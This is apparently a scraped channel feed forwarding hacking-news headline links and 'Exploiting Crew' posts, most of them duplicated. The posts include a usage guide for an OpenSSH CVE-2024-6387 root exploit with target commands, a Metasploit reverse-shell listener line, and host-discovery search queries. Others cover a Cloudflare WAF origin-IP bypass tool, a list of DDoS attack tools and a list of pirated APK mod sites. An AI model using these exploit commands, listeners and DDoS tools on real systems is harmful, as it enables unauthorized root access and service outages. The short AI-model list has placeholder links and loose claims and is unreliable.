Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
π¨ Informative Critical Vulnerability in Metabase: Potential for Remote Code Execution
https://undercodenews.com/informative-critical-vulnerability-in-metabase-potential-for-remote-code-execution/
@Undercode_News
https://undercodenews.com/informative-critical-vulnerability-in-metabase-potential-for-remote-code-execution/
@Undercode_News
UNDERCODE NEWS
Informative Critical Vulnerability in Metabase: Potential for Remote Code Execution - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andβ¦
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
π₯οΈ Vulnerable Zyxel Devices Exposed to Remote Code Execution
https://undercodenews.com/vulnerable-zyxel-devices-exposed-to-remote-code-execution/
@Undercode_News
https://undercodenews.com/vulnerable-zyxel-devices-exposed-to-remote-code-execution/
@Undercode_News
UNDERCODE NEWS
Vulnerable Zyxel Devices Exposed to Remote Code Execution - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andβ¦
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
β‘οΈ Urgent #Update: Proself #Software Vulnerable to XXE Attacks - Take Action Now!
https://undercodenews.com/urgent-update-proself-software-vulnerable-to-xxe-attacks-take-action-now/
@Undercode_News
https://undercodenews.com/urgent-update-proself-software-vulnerable-to-xxe-attacks-take-action-now/
@Undercode_News
UNDERCODE NEWS
Urgent Update: Proself Software Vulnerable to XXE Attacks - Take Action Now! - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andβ¦
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
π¨ Improved A Critical Vulnerability in #Apple Products
https://undercodenews.com/improved-a-critical-vulnerability-in-apple-products/
@Undercode_News
https://undercodenews.com/improved-a-critical-vulnerability-in-apple-products/
@Undercode_News
UNDERCODE NEWS
Improved A Critical Vulnerability in Apple Products - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andβ¦
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
π¨ vCenter Server Privilege Escalation Vulnerability (#CVE-2023-20867)
https://undercodenews.com/vcenter-server-privilege-escalation-vulnerability-cve-2023-20867/
@Undercode_News
https://undercodenews.com/vcenter-server-privilege-escalation-vulnerability-cve-2023-20867/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
π¨ Warning: Patch Your #Cisco ASA Now - Decade-Old WebVPN Flaw Actively Exploited
https://undercodenews.com/warning-patch-your-cisco-asa-now-decade-old-webvpn-flaw-actively-exploited/
@Undercode_News
https://undercodenews.com/warning-patch-your-cisco-asa-now-decade-old-webvpn-flaw-actively-exploited/
@Undercode_News
UNDERCODE NEWS
Warning: Patch Your Cisco ASA Now - Decade-Old WebVPN Flaw Actively Exploited - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andβ¦
Forwarded from Exploiting Crew (Pr1vAt3)
πππ ππ πππππππ ππππππππ π
ππ πππππππππππππ ππππ
πππππππππ
βΉοΈ Hereβs a comprehensive list of top VMs tailored for various cybersecurity domains, from Pentesting and Red Teaming to Digital Forensics and Privacy:
πΏ Predator-OS (Pentesting):
https://predator-os.ir/
πΏ BlackArch Linux (Pentesting):
https://lnkd.in/dQuQV4SK
πΏ BackBox (Pentesting):
https://www.backbox.org/
πΏ Kookarai (Pentesting):
https://lnkd.in/d-4ckJ97
πΏ Parrot Security OS (Red and Blue Team operation):
https://parrotsec.org/
πΏ Commando VM (Windows-based Pentesting/Red Teaming):
https://lnkd.in/dec8_V3B
πΏ Whonix (Privacy and Anonymity):
https://lnkd.in/dpWagU2f
πΏ Tails (Privacy and Anonymity):
https://tails.net/
πΏ Qubes OS (Hypervisor):
https://www.qubes-os.org/
πΏ Mandiant Threat Pursuit (Windows-based Threat Intelligence and Hunting):
https://lnkd.in/d-N4Dt9x
πΏ Tsurugi Linux (Digital Forensics and OSINT):
https://lnkd.in/dsr-ekeB
πΏ SIFT Workstation (Digital Forensics):
https://lnkd.in/dmnZRNNP
πΏ CSI Linux (Digital Forensics):
https://csilinux.com/
πΏ CAINE (Digital Forensics):
https://lnkd.in/dYn9b7Hs
πΏ RedHunt Labs-OS Linux (Adversary Emulation and Threat Hunting):
https://lnkd.in/db5sd6h3
πΏ FLARE-VM (Reverse Engineering):
https://lnkd.in/ds9s4Wdz
πΏ REMnux (Reverse Engineering/Malware Analysis):
https://remnux.org/
πΏ Trace Labs OSINT VM (OSINT to Find Missing Persons):
https://lnkd.in/dsymX2KG
πΏ Security Onion Solutions, LLC (Threat Hunting, Network Security Monitoring, and Log Management):
https://lnkd.in/d4r6myav
βΉοΈ Hereβs a comprehensive list of top VMs tailored for various cybersecurity domains, from Pentesting and Red Teaming to Digital Forensics and Privacy:
πΏ Predator-OS (Pentesting):
https://predator-os.ir/
πΏ BlackArch Linux (Pentesting):
https://lnkd.in/dQuQV4SK
πΏ BackBox (Pentesting):
https://www.backbox.org/
πΏ Kookarai (Pentesting):
https://lnkd.in/d-4ckJ97
πΏ Parrot Security OS (Red and Blue Team operation):
https://parrotsec.org/
πΏ Commando VM (Windows-based Pentesting/Red Teaming):
https://lnkd.in/dec8_V3B
πΏ Whonix (Privacy and Anonymity):
https://lnkd.in/dpWagU2f
πΏ Tails (Privacy and Anonymity):
https://tails.net/
πΏ Qubes OS (Hypervisor):
https://www.qubes-os.org/
πΏ Mandiant Threat Pursuit (Windows-based Threat Intelligence and Hunting):
https://lnkd.in/d-N4Dt9x
πΏ Tsurugi Linux (Digital Forensics and OSINT):
https://lnkd.in/dsr-ekeB
πΏ SIFT Workstation (Digital Forensics):
https://lnkd.in/dmnZRNNP
πΏ CSI Linux (Digital Forensics):
https://csilinux.com/
πΏ CAINE (Digital Forensics):
https://lnkd.in/dYn9b7Hs
πΏ RedHunt Labs-OS Linux (Adversary Emulation and Threat Hunting):
https://lnkd.in/db5sd6h3
πΏ FLARE-VM (Reverse Engineering):
https://lnkd.in/ds9s4Wdz
πΏ REMnux (Reverse Engineering/Malware Analysis):
https://remnux.org/
πΏ Trace Labs OSINT VM (OSINT to Find Missing Persons):
https://lnkd.in/dsymX2KG
πΏ Security Onion Solutions, LLC (Threat Hunting, Network Security Monitoring, and Log Management):
https://lnkd.in/d4r6myav
Penetration testing and Ethical hacking
mainpage
What is Predator-OS   v3.5 01-01-2025 Polymorphic Security Platform Predator-OS is an advanced Linux distribution developed in 2021 by Hossein Seilani, the creator of other well-known [β¦]
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
π‘οΈ #Ransomware Targets National Center for Financial Education: A Wake-Up Call for Cybersecurity Preparedness
https://undercodenews.com/ransomware-targets-national-center-for-financial-education-a-wake-up-call-for-cybersecurity-preparedness/
@Undercode_News
https://undercodenews.com/ransomware-targets-national-center-for-financial-education-a-wake-up-call-for-cybersecurity-preparedness/
@Undercode_News
UNDERCODE NEWS
Ransomware Targets National Center for Financial Education: A Wake-Up Call for Cybersecurity Preparedness - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andβ¦
Forwarded from Exploiting Crew (Pr1vAt3)
π¦Cloudflare Bypass:
CrimeFlare - Bypass Cloudflare WAF and Reveal Real IPs
CrimeFlare is a PHP-based tool designed to identify the original IP address of websites protected by Cloudflare's Web Application Firewall (WAF). This information can be valuable for penetration testing and deeper analysis of websites that rely on Cloudflare for anonymity and security.
---
Features:
1. Cloudflare Information:
- Cloudflare-protected IPs.
- Cloudflare NS1 and NS2 details.
2. Real IP Revelation:
- Unmasks the original IP behind Cloudflare protection.
3. Additional Metadata:
- Hostname.
- Organization.
- Location details (Country, City, Region, Postal Code, Time Zone).
---
Disclaimer:
The tool is for educational and lawful penetration testing purposes only. Misuse of CrimeFlare for unauthorized access or malicious activities is illegal and unethical.
---
Installation:
#### Prerequisites:
1. PHP and
Install on Ubuntu:
#### Clone the Repository:
#### Run the Script:
To reveal the real IP behind a domain:
#### Easy Installation:
For quick execution from anywhere on Linux:
Now you can run CrimeFlare with:
---
### API Sources:
1. CrimeFlare API: [https://crimeflare.zidansec.com](https://crimeflare.zidansec.com)
2. IPInfo API: [http://ipinfo.io](http://ipinfo.io/2.2.2.2/json)
---
### Code Example:
CrimeFlare uses simple PHP scripting with APIs to gather and process data. The script sends HTTP requests to API endpoints and processes JSON responses to display the original IP and related metadata.
---
### Additional OSINT Tool:
OsintSec:
A tool for visualizing networks from domains, IPs, and emails.
[OsintSec Tool](https://osinthreat.herokuapp.com/)
---
### Quick Commands:
- Clone repository:
- Execute the script:
- Install for system-wide access:
- Run directly:
---
### GitHub Repository:
Access the archived repository for full documentation and source code:
[CrimeFlare GitHub Repository](https://github.com/zidansec/CloudPeler)
CrimeFlare - Bypass Cloudflare WAF and Reveal Real IPs
CrimeFlare is a PHP-based tool designed to identify the original IP address of websites protected by Cloudflare's Web Application Firewall (WAF). This information can be valuable for penetration testing and deeper analysis of websites that rely on Cloudflare for anonymity and security.
---
Features:
1. Cloudflare Information:
- Cloudflare-protected IPs.
- Cloudflare NS1 and NS2 details.
2. Real IP Revelation:
- Unmasks the original IP behind Cloudflare protection.
3. Additional Metadata:
- Hostname.
- Organization.
- Location details (Country, City, Region, Postal Code, Time Zone).
---
Disclaimer:
The tool is for educational and lawful penetration testing purposes only. Misuse of CrimeFlare for unauthorized access or malicious activities is illegal and unethical.
---
Installation:
#### Prerequisites:
1. PHP and
php-curl must be installed. Install on Ubuntu:
sudo apt install php php-curl
#### Clone the Repository:
git clone https://github.com/zidansec/CloudPeler.git
cd CloudPeler
#### Run the Script:
To reveal the real IP behind a domain:
php crimeflare.php example.com
#### Easy Installation:
For quick execution from anywhere on Linux:
sudo wget https://github.com/zidansec/CloudPeler/raw/master/crimeflare.php -O /bin/crimeflare
sudo chmod +x /bin/crimeflare
Now you can run CrimeFlare with:
crimeflare example.com
---
### API Sources:
1. CrimeFlare API: [https://crimeflare.zidansec.com](https://crimeflare.zidansec.com)
2. IPInfo API: [http://ipinfo.io](http://ipinfo.io/2.2.2.2/json)
---
### Code Example:
CrimeFlare uses simple PHP scripting with APIs to gather and process data. The script sends HTTP requests to API endpoints and processes JSON responses to display the original IP and related metadata.
---
### Additional OSINT Tool:
OsintSec:
A tool for visualizing networks from domains, IPs, and emails.
[OsintSec Tool](https://osinthreat.herokuapp.com/)
---
### Quick Commands:
- Clone repository:
git clone https://github.com/zidansec/CloudPeler.git
- Execute the script:
php crimeflare.php example.com
- Install for system-wide access:
sudo wget https://github.com/zidansec/CloudPeler/raw/master/crimeflare.php -O /bin/crimeflare
sudo chmod +x /bin/crimeflare
- Run directly:
crimeflare example.com
---
### GitHub Repository:
Access the archived repository for full documentation and source code:
[CrimeFlare GitHub Repository](https://github.com/zidansec/CloudPeler)
GitHub
GitHub - zidansec/CloudPeler: CrimeFlare is a useful tool for bypassing websites protected by CloudFlare WAF, with this tool youβ¦
CrimeFlare is a useful tool for bypassing websites protected by CloudFlare WAF, with this tool you can easily see the real IP of websites that have been protected by CloudFlare. The resulting infor...
Forwarded from Exploiting Crew (Pr1vAt3)
π¦Largest and most advanced AI models available on Hugging Face in 2024:
1. DeepSeek LLM 67B Base
- Parameters: 67 billion
- Highlights: Exceptional at reasoning, coding, and mathematics, surpassing GPT-3.5 and Llama2-70B.
- Official URL: [DeepSeek LLM 67B Base on Hugging Face](https://huggingface.co/models).
2. Yi-34B-Llama
- Parameters: 34 billion
- Highlights: Multi-modal processing for text, code, and images, with zero-shot learning capabilities.
- Official URL: [Yi-34B-Llama on Hugging Face](https://huggingface.co/models).
3. Qwen/Qwen2.5-72B-Instruct
- Parameters: 72 billion
- Highlights: Advanced role-playing, long text generation, and structured data understanding.
- Official URL: [Qwen2.5-72B-Instruct](https://huggingface.co/Qwen/Qwen2.5-72B-Instruct).
4. Llama 3.3-70B-Instruct
- Parameters: 70 billion
- Highlights: Ideal for daily use with highly capable instruction-following capabilities.
- Official URL: [Llama 3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct).
5. Nyxene-v2-11B
- Parameters: 11 billion
- Highlights: Efficient processing and high fluency in text generation and question answering.
- Official URL: [Nyxene-v2-11B](https://huggingface.co/models).
For a comprehensive list of models and their detailed capabilities, visit [Hugging Face's model hub](https://huggingface.co/models).
1. DeepSeek LLM 67B Base
- Parameters: 67 billion
- Highlights: Exceptional at reasoning, coding, and mathematics, surpassing GPT-3.5 and Llama2-70B.
- Official URL: [DeepSeek LLM 67B Base on Hugging Face](https://huggingface.co/models).
2. Yi-34B-Llama
- Parameters: 34 billion
- Highlights: Multi-modal processing for text, code, and images, with zero-shot learning capabilities.
- Official URL: [Yi-34B-Llama on Hugging Face](https://huggingface.co/models).
3. Qwen/Qwen2.5-72B-Instruct
- Parameters: 72 billion
- Highlights: Advanced role-playing, long text generation, and structured data understanding.
- Official URL: [Qwen2.5-72B-Instruct](https://huggingface.co/Qwen/Qwen2.5-72B-Instruct).
4. Llama 3.3-70B-Instruct
- Parameters: 70 billion
- Highlights: Ideal for daily use with highly capable instruction-following capabilities.
- Official URL: [Llama 3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct).
5. Nyxene-v2-11B
- Parameters: 11 billion
- Highlights: Efficient processing and high fluency in text generation and question answering.
- Official URL: [Nyxene-v2-11B](https://huggingface.co/models).
For a comprehensive list of models and their detailed capabilities, visit [Hugging Face's model hub](https://huggingface.co/models).
huggingface.co
Models β Hugging Face
Explore machine learning models.
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
π¨ Bypassing Browser Isolation: A New Threat Landscape
https://undercodenews.com/bypassing-browser-isolation-a-new-threat-landscape/
@Undercode_News
https://undercodenews.com/bypassing-browser-isolation-a-new-threat-landscape/
@Undercode_News
UNDERCODE NEWS
Bypassing Browser Isolation: A New Threat Landscape - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andβ¦
Forwarded from Exploiting Crew (Pr1vAt3)
π¦Best apk mod websites:
1 apkmody https://apkmody.io βοΈ
2 modcombo https://modcombo.com βοΈ
3 happymod https://happymod.com βοΈ
4 modyolo https://modyolo.com βοΈ
5 luckymodapk https://www.luckymodapk.com βοΈ
6 an1 https://an1.com βοΈ
7 getmodsapk https://getmodsapk.com βοΈ
8 moddroid https://moddroid.co βοΈ
9 modded-1 https://modded-1.com βοΈ
10 techbigs https://techbigs.com βοΈ
11 apktodo https://apktodo.com βοΈ
12 m.playmods https://m.playmods.net βοΈ
13 modradar https://modradar.net βοΈ
14 apkmodule https://apkmodule.com βοΈ
15 modhello https://modhello.com βοΈ
1 apkmody https://apkmody.io βοΈ
2 modcombo https://modcombo.com βοΈ
3 happymod https://happymod.com βοΈ
4 modyolo https://modyolo.com βοΈ
5 luckymodapk https://www.luckymodapk.com βοΈ
6 an1 https://an1.com βοΈ
7 getmodsapk https://getmodsapk.com βοΈ
8 moddroid https://moddroid.co βοΈ
9 modded-1 https://modded-1.com βοΈ
10 techbigs https://techbigs.com βοΈ
11 apktodo https://apktodo.com βοΈ
12 m.playmods https://m.playmods.net βοΈ
13 modradar https://modradar.net βοΈ
14 apkmodule https://apkmodule.com βοΈ
15 modhello https://modhello.com βοΈ
ModCombo.com
MODCOMBO - Free MOD APK Games & Premium Apps for Android 2025
Download free MOD APK games & premium apps at ModCombo. Enjoy unlimited money, unlocked features, and cheat mods to beat any Android game in 2025!
Forwarded from Exploiting Crew (Pr1vAt3)
π¦Exploit The 2024 OpenSSH sshd:
A critical vulnerability identified as CVE-2024-6387 affects OpenSSH
π Vulnerability Overview
- **Discovered by: Researchers at Qualys in May 2024.
- Root Cause:
A race condition triggered in the
- Impact:
- Allows unauthenticated attackers to gain root privileges remotely.
- Exploits the default
π Features of Exploitation Tool
1. Rapid Scanning: Scans multiple IPs, domains, or CIDR ranges for this vulnerability.
2. Version Detection: Identifies OpenSSH versions and checks for patched systems.
3. Banner Retrieval: Fetches SSH banners for identification without authentication.
4. Multi-threading: Increases efficiency and exploit chances using concurrent threads.
5. Customizable Outputs: Saves results in formats like JSON, CSV, or plain text.
6. Port Scanning: Detects open/closed ports and highlights non-responsive hosts.
7. IPv6 Support: Fully compatible with IPv6 scanning.
---
βοΈ Usage Instructions
#### Prerequisites
- Ensure Python 3.x is installed.
- Install dependencies (if required):
#### Basic Commands
- Scan a Target:
- Exploit a Target:
#### Advanced Options
| Argument | Description | Default |
|-----------------------|--------------------------------------------------------------|--------------|
|
|
|
|
|
|
---
### Escalation Process
#### Setting Up Payload Listener
Before exploiting, set up a reverse shell listener:
#### Exploitation Example
Run the exploit tool with the configured settings:
---
### π Host Discovery
#### OSINT Techniques
- Hunter:
- FOFA:
- SHODAN:
- CENSYS:
---
### π‘ Mitigation Strategies
1. Patch Management
- Upgrade to the latest patched version of OpenSSH to close this vulnerability.
2. Limit Access
- Restrict SSH access to trusted IPs/networks using firewalls or VPNs.
3. Enable Monitoring
- Use IDS/IPS tools to detect and prevent exploitation attempts.
4. Network Segmentation
- Isolate critical systems to reduce lateral movement risks in case of compromise.
5. Log Analysis
- Continuously monitor logs for unusual SSH activities or patterns.
Color-Coded Output
- π’ Green: Successful connection or exploit.
- π΄ Red: Failed connection or error.
- π‘ Yellow: Warnings or notable information.
- π΅ Cyan: General updates or information.
Full on: https://github.com/asterictnl-lvdw/CVE-2024-6387
A critical vulnerability identified as CVE-2024-6387 affects OpenSSH
sshd and allows remote unauthenticated attackers to execute arbitrary code as root due to a signal handler race condition. Below is a comprehensive breakdown of this flaw, usage instructions for associated tools, and mitigation strategies.π Vulnerability Overview
- **Discovered by: Researchers at Qualys in May 2024.
- Root Cause:
A race condition triggered in the
SIGALRM handler of sshd when a client fails to authenticate within the LoginGraceTime (default 120 seconds). This handler invokes functions that are not asynchronous-signal-safe, creating a window for exploitation. - Impact:
- Allows unauthenticated attackers to gain root privileges remotely.
- Exploits the default
LoginGraceTime settings. π Features of Exploitation Tool
1. Rapid Scanning: Scans multiple IPs, domains, or CIDR ranges for this vulnerability.
2. Version Detection: Identifies OpenSSH versions and checks for patched systems.
3. Banner Retrieval: Fetches SSH banners for identification without authentication.
4. Multi-threading: Increases efficiency and exploit chances using concurrent threads.
5. Customizable Outputs: Saves results in formats like JSON, CSV, or plain text.
6. Port Scanning: Detects open/closed ports and highlights non-responsive hosts.
7. IPv6 Support: Fully compatible with IPv6 scanning.
---
βοΈ Usage Instructions
#### Prerequisites
- Ensure Python 3.x is installed.
- Install dependencies (if required):
pip install -r requirements.txt
#### Basic Commands
- Scan a Target:
python3 CVE-2024-6387.py scan -T example.com -p 22
- Exploit a Target:
python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0
#### Advanced Options
| Argument | Description | Default |
|-----------------------|--------------------------------------------------------------|--------------|
|
-T, --targets | IP, domain, file path, or CIDR range to scan. | N/A ||
-p, --port | SSH port to target. | 22 ||
-s, --speed | Threads for scanning/exploitation. | 10 ||
-t, --timeout | Connection timeout in seconds. | 1 ||
-o, --output | Output format (csv, txt, json). | json ||
-g, --gracetimecheck| Check for LoginGraceTime mitigation (seconds). | 120 |---
### Escalation Process
#### Setting Up Payload Listener
Before exploiting, set up a reverse shell listener:
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"#### Exploitation Example
Run the exploit tool with the configured settings:
python3 CVE-2024-6387.py exploit -T target.com -p 22 -n eth0
---
### π Host Discovery
#### OSINT Techniques
- Hunter:
/product.name="OpenSSH" - FOFA:
app="OpenSSH" - SHODAN:
product:"OpenSSH" - CENSYS:
(openssh) and labels=remote-access ---
### π‘ Mitigation Strategies
1. Patch Management
- Upgrade to the latest patched version of OpenSSH to close this vulnerability.
2. Limit Access
- Restrict SSH access to trusted IPs/networks using firewalls or VPNs.
3. Enable Monitoring
- Use IDS/IPS tools to detect and prevent exploitation attempts.
4. Network Segmentation
- Isolate critical systems to reduce lateral movement risks in case of compromise.
5. Log Analysis
- Continuously monitor logs for unusual SSH activities or patterns.
Color-Coded Output
- π’ Green: Successful connection or exploit.
- π΄ Red: Failed connection or error.
- π‘ Yellow: Warnings or notable information.
- π΅ Cyan: General updates or information.
Full on: https://github.com/asterictnl-lvdw/CVE-2024-6387
GitHub
GitHub - Karmakstylez/CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387) - Karmakstylez/CVE-2024-6387
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
π± #Apple's Entry-Level iPad: A Long-Awaited Refresh
https://undercodenews.com/apples-entry-level-ipad-a-long-awaited-refresh/
@Undercode_News
https://undercodenews.com/apples-entry-level-ipad-a-long-awaited-refresh/
@Undercode_News
UNDERCODE NEWS
Apple's Entry-Level iPad: A Long-Awaited Refresh - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andβ¦
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
π₯οΈ Call of Duty Servers Face Frequent Outages During Weekends Due to High Player Traffic
https://undercodenews.com/call-of-duty-servers-face-frequent-outages-during-weekends-due-to-high-player-traffic/
@Undercode_News
https://undercodenews.com/call-of-duty-servers-face-frequent-outages-during-weekends-due-to-high-player-traffic/
@Undercode_News
UNDERCODE NEWS
Call of Duty Servers Face Frequent Outages During Weekends Due to High Player Traffic - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andβ¦
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
#Microsoft's Outlook Transition: A User's Perspective
https://undercodenews.com/microsofts-outlook-transition-a-users-perspective/
@Undercode_News
https://undercodenews.com/microsofts-outlook-transition-a-users-perspective/
@Undercode_News
UNDERCODE NEWS
Microsoft's Outlook Transition: A User's Perspective - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andβ¦
Forwarded from Exploiting Crew (Pr1vAt3)
π¦Top DDoS Tools for Educational Penetration Testing in 2024:
Disclaimer: This list is strictly for educational and ethical purposes. Unauthorized use of these tools for malicious activities is illegal and punishable by law. Always seek proper authorization before conducting penetration testing.
1. [LOIC (Low Orbit Ion Cannon)](https://sourceforge.net/projects/loic/)
- Description: A classic open-source tool designed for stress testing. LOIC is beginner-friendly and allows users to send HTTP, UDP, or TCP packets to a target.
- Features:
- User-friendly GUI.
- Manual or automatic attack modes.
- Use Case: Useful for testing smaller systems under stress.
---
2. [HOIC (High Orbit Ion Cannon)](https://github.com/grayhats/hoic)
- Description: An upgraded version of LOIC, HOIC can send multiple HTTP requests simultaneously, making it more potent.
- Features:
- "Booster" scripts to amplify attack strength.
- Open-source.
- Use Case: Effective for simulating HTTP-based volumetric attacks.
---
3. [Xerxes](https://github.com/zanyarjamal/xerxes)
- Description: A lightweight yet powerful tool for layer-7 DDoS attacks.
- Features:
- Portable and efficient.
- Easy-to-use command-line interface.
- Use Case: Ideal for testing web servers' resilience to high-volume HTTP requests.
---
4. [HULK (HTTP Unbearable Load King)](https://github.com/grafov/hulk)
- Description: A unique tool designed for testing web servers by generating dynamic and random HTTP GET requests.
- Features:
- Evades caching mechanisms with randomized requests.
- Simple to configure.
- Use Case: Used for stress-testing websites against large traffic surges.
---
5. [GoldenEye](https://github.com/jseidl/GoldenEye)
- Description: A Python-based tool for generating HTTP and HTTPS requests to overwhelm web servers.
- Features:
- Advanced request customization.
- Supports both HTTP and HTTPS.
- Use Case: Testing web applications for resilience against layer-7 DDoS attacks.
---
6. [UFONet](https://github.com/epsylon/ufonet)
- Description: A multi-vector tool that leverages open proxies and botnets for stress testing.
- Features:
- Supports multiple attack vectors.
- GUI and CLI interfaces available.
- Use Case: Testing distributed attacks with open proxy networks.
---
7. [DDOSIM (DDoS Simulator)](https://sourceforge.net/projects/ddosim/)
- Description: A simulation tool that replicates a botnet by performing DDoS attacks like TCP, HTTP, and UDP floods.
- Features:
- Simulates real botnet behavior.
- Layer-7 attack simulation.
- Use Case: Ideal for advanced penetration testers studying application-layer attacks.
Disclaimer: This list is strictly for educational and ethical purposes. Unauthorized use of these tools for malicious activities is illegal and punishable by law. Always seek proper authorization before conducting penetration testing.
1. [LOIC (Low Orbit Ion Cannon)](https://sourceforge.net/projects/loic/)
- Description: A classic open-source tool designed for stress testing. LOIC is beginner-friendly and allows users to send HTTP, UDP, or TCP packets to a target.
- Features:
- User-friendly GUI.
- Manual or automatic attack modes.
- Use Case: Useful for testing smaller systems under stress.
---
2. [HOIC (High Orbit Ion Cannon)](https://github.com/grayhats/hoic)
- Description: An upgraded version of LOIC, HOIC can send multiple HTTP requests simultaneously, making it more potent.
- Features:
- "Booster" scripts to amplify attack strength.
- Open-source.
- Use Case: Effective for simulating HTTP-based volumetric attacks.
---
3. [Xerxes](https://github.com/zanyarjamal/xerxes)
- Description: A lightweight yet powerful tool for layer-7 DDoS attacks.
- Features:
- Portable and efficient.
- Easy-to-use command-line interface.
- Use Case: Ideal for testing web servers' resilience to high-volume HTTP requests.
---
4. [HULK (HTTP Unbearable Load King)](https://github.com/grafov/hulk)
- Description: A unique tool designed for testing web servers by generating dynamic and random HTTP GET requests.
- Features:
- Evades caching mechanisms with randomized requests.
- Simple to configure.
- Use Case: Used for stress-testing websites against large traffic surges.
---
5. [GoldenEye](https://github.com/jseidl/GoldenEye)
- Description: A Python-based tool for generating HTTP and HTTPS requests to overwhelm web servers.
- Features:
- Advanced request customization.
- Supports both HTTP and HTTPS.
- Use Case: Testing web applications for resilience against layer-7 DDoS attacks.
---
6. [UFONet](https://github.com/epsylon/ufonet)
- Description: A multi-vector tool that leverages open proxies and botnets for stress testing.
- Features:
- Supports multiple attack vectors.
- GUI and CLI interfaces available.
- Use Case: Testing distributed attacks with open proxy networks.
---
7. [DDOSIM (DDoS Simulator)](https://sourceforge.net/projects/ddosim/)
- Description: A simulation tool that replicates a botnet by performing DDoS attacks like TCP, HTTP, and UDP floods.
- Features:
- Simulates real botnet behavior.
- Layer-7 attack simulation.
- Use Case: Ideal for advanced penetration testers studying application-layer attacks.
SourceForge
LOIC
Download LOIC for free. A network stress testing application. Low Orbit Ion Cannon. The project only keeps and maintains (bug fixing) the code written by the original author - Praetox, but is not associated or related to it.
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
π Massive Data Leak Exposes Millions of Employees from Top Companies
https://undercodenews.com/massive-data-leak-exposes-millions-of-employees-from-top-companies/
@Undercode_News
https://undercodenews.com/massive-data-leak-exposes-millions-of-employees-from-top-companies/
@Undercode_News
UNDERCODE NEWS
Massive Data Leak Exposes Millions of Employees from Top Companies - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andβ¦
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Large CTF collections:
### TryHackMe (THM) Links
1. [Official TryHackMe Website](https://tryhackme.com)
2. [TryHackMe Learning Paths](https://tryhackme.com/paths)
3. [Free Rooms on TryHackMe](https://tryhackme.com/free)
4. [TryHackMe Discord Community](https://discord.gg/tryhackme)
5. [TryHackMe Blog](https://blog.tryhackme.com)
6. [GitHub: Awesome TryHackMe Writeups](https://github.com/0xagun/awesome-tryhackme-writeups)
### Popular CTF Platforms
7. [Hack The Box](https://www.hackthebox.com/)
8. [CTFtime](https://ctftime.org/)
9. [PicoCTF](https://picoctf.org/)
10. [Root Me](https://www.root-me.org/)
11. [OverTheWire Wargames](https://overthewire.org/)
12. [CyberSecLabs](https://cyberseclabs.co.uk/)
13. [THM vs HTB Writeups](https://github.com/Ignitetechnologies)
### CTF Challenges & Resources
14. [Cryptohack](https://cryptohack.org/)
15. [WeChall Challenges](https://www.wechall.net/)
16. [Challenges on CTFlearn](https://ctflearn.com/)
17. [W3Challs](https://w3challs.com/)
18. [Hacker101 CTF](https://ctf.hacker101.com/)
19. [Defend the Web](https://defendtheweb.net/)
20. [RingZer0 Team Online CTF](https://ringzer0ctf.com/)
### Tools for Practice
21. [VulnHub](https://www.vulnhub.com/)
22. [TryHackMe GitHub Repository](https://github.com/topics/tryhackme)
23. [CTFd (Create Your Own CTF)](https://ctfd.io/)
24. [CrackStation](https://crackstation.net/)
### Writeups and Blogs
25. [CTF Writeups GitHub](https://github.com/ctfs/write-ups-2019)
26. [TryHackMe Subreddit](https://www.reddit.com/r/tryhackme/)
27. [Hack The Box Subreddit](https://www.reddit.com/r/hackthebox/)
28. [Infosec Writeups on Medium](https://medium.com/bugbountywriteup)
### Learning Resources
29. [Hack This Site](https://www.hackthissite.org/)
30. [Cyber Security Challenge](https://cybersecuritychallenge.org.uk/)
31. [OWASP Juice Shop](https://owasp.org/www-project-juice-shop/)
32. [CTF Field Guide (Trail of Bits)](https://trailofbits.github.io/ctf/)
